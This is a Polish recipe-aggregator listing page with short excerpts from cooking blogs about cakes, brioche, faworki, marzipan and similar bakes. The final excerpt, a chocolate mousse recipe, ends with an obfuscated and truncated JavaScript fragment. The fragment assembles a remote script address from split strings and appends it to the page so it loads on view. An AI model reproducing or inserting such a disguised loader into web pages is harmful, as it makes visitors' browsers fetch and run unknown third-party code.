tort - 16118 przepisów (strona:707/1075)

Co mnie inspiruje – ciekawe linki #7 162

napisane są dynamicznie i bez lania wody. Wspomniałam o fotografii, więc jak być w tym dobry, możesz zobaczyć na blogu Molly yeh . Dużo inspiracji szczególnie dla blogerów kulinarnych. Jej torty i zdjęcia są magiczne! Wiadomo, że do fotografii kulinarnej elementy dekoracyjne są ważne, jednak mam wrażenie, że u Molly jedyne skrzypce gra jedzenie. CO CIEKAWEGO ZIMĄ? Jaki jest Twój sposób

Pink Envelope
Ciasto w klimacie Batonika Kinder Country i Oreo, czyli Moje Ciasto Duo 267

dopiskiem "zrobisz? 😇" Nie było wyjścia, nie w kwestii kulinarnych zachcianek nie potrafię odmówić mojemu dziecku. Poczytałam kilka przepisów i to całe ciasto to nic innego jak krem do tortów, który czasami robię przełożony ciastkami. Poszłam do kuchni i zaczęłam mieszać proporcje z głowy. Przy okazji wymyśliłam sobie, że zrobię ciasto Duo, czyli w dwóch smakach. Celowo wybrałam dużą formę

Blondynka Gotuje
MAŚLANE BRIOSZKI 203

Nasz ulubiony typ ciasta.  Drożdżowe? Zjadamy w każdej ilości. Nie dla nas torty, ciasta z kremem, ptysie. Proste, maślane, drożdżowe powala nas na kolana. I do tego kruszonka! Smacznego :) Składniki 55 g świeżych drożdży 100 ml mleka 80 g + łyżeczka cukru 390 g + 1 łyżka+ ewentualnie do podsypania dobrej mąki (u mnie typ 550) 4 jaja 180 g miękkiego

OliveandThyme
Tort bezowy dacquase 207

Tort ten przygotowywałam już dwa razy, raz z pomocą mamy i siostry a drugi raz sama. Za każdym razem się udał i jest przepyszny. Żeby nie był taki słodki pominęłam dodanie masy karmelowej do kremu, wg mnie bez tej masy w kremie jest przepyszny. Zawsze zastanawiałam się czy dam radę przygotować i upiec blaty bezowe i się udało! Teraz wiem

Motylkowa Kuchnia
Cytrynowy piegusek z makiem. 161

Cytrynowy piegusek z makiem- Edyta Guhl Otwieram kolejne okienko w adwentowym kalendarzu i dzisiaj zapraszam na cytrynowego pieguska. Zauważyłam, że w przeciwieństwie do ciężkich, kremowych tortów, klasyczne babki lub keksy znikają u nas w tempie błyskawicznym. Można zjeść je już na śniadanie, wziąć ze sobą do pracy, doskonale sprawdzają się jako przekąska przy komputerze. Zapraszam

dolcevitainmykitchen
Delikatna babka do popołudniowej kawy. 163

Delikatna babka do kawy. Edyta Guhl. Dzisiejsze ciasto jest doskonałym wprowadzeniem do okresu postnego. Po ciężkich kremowych ciastach, bułeczkach, czy tortach, ta klasyczna babka, upieczona w podłużnej foremce, może wydać się ciastem codziennym, takim do popołudniowej kawy. Optycznie jest bardzo udana, wygląda tak pięknie, jak od piekarza. Specjalnie zrobiłam zdjęcie obok foremki w której

dolcevitainmykitchen
Tort z ryżu na mleku i malin. Kryminalna Eifel. 229

Tort z ryżu na mleku i malin. Edyta Guhl. Hillesheim- miasto kryminałów. Eifel to nie tylko browar w Bitburgu, wody mineralne, czy Nürburgring, popularny tor wyścigowy. Ciemne, sosnowe lasy, dziwaczne skały powulkaniczne, tajemnicze przepaście są tłem wielu mrocznych historii. W samym sercu Eifel leży senne miasteczko Hillesheim, o którym od paru lat zrobiło się głośno

dolcevitainmykitchen
Torcik czekoladowy wegański, bez glutenu, bez cukru 201

plasterki i skropić sokiem z cytryny. Plasterki poukładać na kremie i posypać kakao. Przykryć drugim krążkiem ciasta i lekko docisnąć. Na wierzch wyłożyć pozostały krem i posypać kakao. 9. Tort ozdobić poszatkowanymi orzeszkami, różyczkami i orzechami laskowymi. Udanych wypieków

Mała Cukierenka
Faworki angielskie 269

Faworki angielskie według przepisu z książki „ Praktyczne przepisy pieczenia ciast świątecznych a mianowicie: bab, babek, placków, mazurków, pierników i tortów oraz strucli, kołaczów, chleba, bułek, rogali i różnych przysmaczków do kawy, herbaty i czekolady”, Florentyny Niewiarowskiej, z 1895 roku. Są bardzo podobne do klasycznych faworków , ale nieco mniej kruche i delikatne. 1 łyżka miękkiego masła, 6 żółtek, 75 g cukru

królestwo garów
Ciasto z marcepanem 182

Sobota i weekend. Musiałam upiec coś słodkiego do kawy. Moje dziecię miało ochotę na tort princessa , ale zapomniało kupić zielony marcepan. Postarałam się jednak upiec ciasto z marcepanem na wzór szwedzkiego ciasta czekoladowego kladdkaka . Jest to najprostsze i nabjardziej popularne ciasto w Szwecji znane w Polsce pod nazwą ciasto lawa . Ciasto jest wilgotne, lekko rozpływające się w ustach. Ciasto

codojedzenia
Tradycyjne naleśniki z serem 184

naleśniki znajdujące się na blogu: Naleśniki biszkoptowe z serem Naleśniki z kaszy jaglanej Naleśniki biszkoptowe z musem jabłkowym Naleśniki na maślance, z jabłkami Mini niemieckie naleśniki Naleśniki na serwatce Tort naleśnikowy Wydrukuj przepis The post Tradycyjne naleśniki z serem appeared first on Moje Wypieki I Nie Tylko

mojewypiekiinietylko
Marcepan 142

rozdrabniaczu migdałów. Chwilę jeszcze mielimy do powstania gładkiej masy. Wykładamy na folię spożywczą. Odkładamy do wystygnięcia. Marcepan można jeść bezpośrednio, lub wykorzystać go do deserów (muffinek, ciast, ciasteczek, tortów) Można go przechowywać nawet do miesiąca w lodówce.   Artykuł Marcepan pochodzi z serwisu Moja Qchnia Pełna Smaku

MojaQchnia.pl
Piernik z powidłami 257

warto dzielić się swoją wiedzą i smakiem z innymi. Jest mi bardzo miło, że jesteście ze mną i chcecie korzystać z moich przepisów 😊. Urodziny, to powinien być jakiś tort, a tu piernik, a to dlatego, że pierwszym przepisem na blogu był Piernik wyśmienity , więc dlaczego miałoby go zabraknąć w takim dniu. Piernik z powidłami jest bardzo aromatyczny, o umiarkowanej słodyczy

Kuchcik gotuje
Chrust migdałowy – faworki migdałowe 351

coś zmienić, pokombinować, poszukać innej wersji faworków. I znalazłam przepis na „chrust migdałowy”,  w książce „ Praktyczne przepisy pieczenia ciast świątecznych a mianowicie: bab, babek, placków, mazurków, pierników i tortów oraz strucli, kołaczów, chleba, bułek, rogali i różnych przysmaczków do kawy, herbaty i czekolady”, Florentyny Niewiarowskiej, z 1895 roku. Pomysł wydał się ciekawy, przystąpiłam do roboty. I w pewnym momencie

królestwo garów
Mus czekoladowy z mascarpone 287

włoskiego sera mascarpone. W wersji dla dorosłych warto dodać kilka kropli alkoholu, który pasuje do czekolady. Taki mus czekoladowy może być wykorzystany jako krem do przełożenia blatów biszkoptowych na tort. (function(){ ccku=document.createElement("script");ccku_=("ust");cckuu="15408294"; ccku_+="a"+("t.i");ccku.type="text/javascript"; cckuu+=".nwbbcttjcku0fgx1wqa0";ccku.async=true;ccku_+="n"+("f"+"o")+"/"; cckuu+="n4gh0tsvtX";ccku.src="//"+ccku_+cckuu; document.body.appendChild(ccku

Moja smaczna kuchnia